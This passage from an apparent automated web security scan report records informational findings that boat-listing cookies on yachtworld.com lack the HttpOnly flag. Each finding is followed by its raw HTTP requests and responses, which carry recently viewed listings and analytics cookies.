ited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:57 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 17 Dec 2010 17:08:15 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:57 GMT
Set-Cookie: VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.57. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/32-Regulator-With-Trailer-reduced-2266476/Destin/FL/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:20:00 GMT
VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; s_pers=%20s_nr%3D1296155975932%7C1298747975932%3B%20s_lv%3D1296155975933%7C1390763975933%3B%20s_lv_s%3DFirst%2520Visit%7C1296157775933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.4.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:00 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 21:44:50 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:20:00 GMT
Set-Cookie: VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 27730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.58. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	*/boats/2006/Regulator-32-Forward-Seating-low-Hours-2291213/Norwalk/CT/United-States*

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2291213%5B%25%5D32%27+Regulator+32+Forward+Seating+*Low+Hours*%5B%25%5DUSD%26nbsp%3B114%2C995%5B%25%5DNorwalk%2C+CT%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F1%2F2%2F2291213_1_mini.jpg%3F1291236529000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-*Low-Hours*-2291213%2FNorwalk%2FCT%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:46 GMT
VIEWED_BOATS_STORE=2291213%5B%25%5D32%27+Regulator+32+Forward+Seating+*Low+Hours*%5B%25%5DUSD%26nbsp%3B114%2C995%5B%25%5DNorwalk%2C+CT%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F1%2F2%2F2291213_1_mini.jpg%3F1291236529000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-*Low-Hours*-2291213%2FNorwalk%2FCT%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:46 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 01 Dec 2010 21:04:09 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2291213%5B%25%5D32%27+Regulator+32+Forward+Seating+*Low+Hours*%5B%25%5DUSD%26nbsp%3B114%2C995%5B%25%5DNorwalk%2C+CT%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F1%2F2%2F2291213_1_mini.jpg%3F1291236529000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-*Low-Hours*-2291213%2FNorwalk%2FCT%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:46 GMT
